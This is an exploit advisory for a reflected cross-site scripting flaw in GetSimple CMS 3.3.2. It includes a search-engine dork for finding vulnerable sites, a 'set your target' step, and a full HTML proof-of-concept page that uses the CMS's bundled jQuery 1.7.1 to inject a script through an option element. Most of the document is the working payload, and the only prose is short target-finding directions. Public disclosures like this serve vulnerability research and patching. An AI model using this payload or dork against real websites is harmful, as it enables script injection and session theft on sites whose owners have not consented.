Headline
GetSimple CMS 3.3.2 Cross Site Scripting
GetSimple CMS version 3.3.2 suffers from a cross site scripting vulnerability.
====================================================================================================================================| # Title : GetSimple CMS v3.3.2 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : http://get-simple.info/ || # Dork : © 2009-2014 GetSimple CMS – Version 3.3.2 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] LIne 5 Se7 y0ur T@rg3t .[+] XSS Reflected - Jquery v1.7.1 :<html><head> <meta charset="utf-8"> <title>XSS Reflected - Jquery v1.7.1 </title> <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script></head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert('xssreflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - [email protected]');</script></option> </select> </p> </form></body></html>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================